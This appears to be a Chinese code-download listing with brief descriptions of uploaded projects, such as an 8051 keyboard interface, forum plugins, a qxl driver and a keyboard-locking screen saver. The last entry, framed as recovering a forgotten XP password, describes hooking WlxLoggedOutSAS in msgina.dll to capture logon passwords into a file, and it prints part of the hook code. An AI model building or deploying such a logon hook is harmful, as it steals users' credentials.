-
对于interfacig 8051单片机与键盘的源代码
设计一个
- 2022-05-21 06:32:07下载
- 积分:1
-
基于CPB v2.0正式版修改而成,主要功能: 1 超连接改成自动变彩色 2 回复增加机遇插件 3 简单门派插件 4 首页发帖明星插件 5 点歌与播放器结合插件...
基于CPB v2.0正式版修改而成,主要功能: 1 超连接改成自动变彩色 2 回复增加机遇插件 3 简单门派插件 4 首页发帖明星插件 5 点歌与播放器结合插件 6 公告加入小狗狗图标-CPB v2.0 Based on the final version of revisions, the main functions : an ultra-connect automatically change color into two plug-in reply to increase opportunities featuring three simple plug-star posting four Top 5 parlors plug-and-play device with plug-six small dogs joined Notice icon
- 2022-07-03 14:54:49下载
- 积分:1
-
qxl驱动源码,包括miniport和display两部分
qxl源码包,Windows qxl驱动,包括miniport和display两部分。使用Windows SDK直接运行build -cZg即可。生成文件包括qxldd.dll和qxl.sys文件。
- 2022-07-14 04:09:56下载
- 积分:1
-
This resource is mainly to achieve image viewer features, operating environment...
此资源主要是实现图片浏览器的功能,运行环境为VC-This resource is mainly to achieve image viewer features, operating environment for the VC
- 2022-07-10 08:07:05下载
- 积分:1
-
Fortran 90 Handbook
Fortran 90 Handbook - Complete ANSI-ISO Reference-Fortran 90 Handbook- Complete ANSI-ISO Reference
- 2022-07-04 02:02:41下载
- 积分:1
-
水声信号的处理水下机器人对目标的定位并提供反馈信息
水声信号的处理水下机器人对目标的定位并提供反馈信息-water voice signal process, locate objects for under water robot
- 2022-07-17 07:35:10下载
- 积分:1
-
one hundred example program in c
one hundred example program in c
- 2023-08-17 12:45:04下载
- 积分:1
-
这个用了好长时间编写的希望对大家用用。如果有不理想的地方请大家与我联系。我会不段完善的。/...
这个用了好长时间编写的希望对大家用用。如果有不理想的地方请大家与我联系。我会不段完善的。/-It takes me a long time to finish it.I hope that it is useful to you.If there is anything unperfect,please tell me. I ll consummate it continuously.
- 2022-01-25 14:18:18下载
- 积分:1
-
本程序运行后将会屏 Alt+Ctrl+Del,Alt+F4,Alt+Tab等键, (Windows 2000 不能屏蔽) 必须在两个Enter键之间输入密码才能...
本程序运行后将会屏 Alt+Ctrl+Del,Alt+F4,Alt+Tab等键, (Windows 2000 不能屏蔽) 必须在两个Enter键之间输入密码才能退出!!!!!!!! 密码是"kkcocoon". 本程序在Visual C++ 6.0 下编译.大家可在vc下打开scrnsave.dsw文件就可以很好的查看源文件.也可以File->New->Project->Win32 Application->起个名字,create new workspace->empty win32 application.然后把一个个文件Add进来,F5->确定,就可以了. 这是一个用纯Windows SDK编写的程序,没有用MFC类库,要看懂此程序 必须要懂得在Windows下编程.本程序只是为了给刚学Windows SDK的同仁 提供适合的示例程序,并给出祥尽注释.-Windows Screen Saver source code, block keyboard input of Alt_Ctrl_Del, Alt+F4, Alt+Tab(can not block in win2000), password is kkcocoon.
- 2022-02-03 17:35:49下载
- 积分:1
-
获取XP登录密码
应用背景当忘记XP系统密码时,可以编译getInfo的dll和exe,执行getInfoRun.exe在下次登录时就可以获取密码了,密码文件保存在windows根目录下的getPwdout.txt文件中关键技术DWORD WINAPI StartHook(LPVOID lpParam)
{
//得到msgina.dll
//hooktable.hMsgina
int n = 0;
hooktable.hMsgina = LoadLibrary("msgina.dll");
n = GetLastError();
if (NULL == hooktable.hMsgina)
{
printf("getmoduleHandle msgina.dll error");
return -1;
}
//得到WlxLoggedOutSAS
hooktable.OldADDR = (WlxLoggedOutSAS)GetProcAddress(hooktable.hMsgina, "WlxLoggedOutSAS");
if (NULL == hooktable.OldADDR)
{
printf("GetProcAddress WlxLoggedOutSAS error");
return -1;
}
int *OpCode = (int*)&hooktable.charJmpCode[1];
int Code = (int)hooktable.NewADDR - (int)hooktable.OldADDR -5;
*OpCode = Code;
HookWlxLoggedOutSAS();
return 0;
}
- 2023-08-31 22:05:04下载
- 积分:1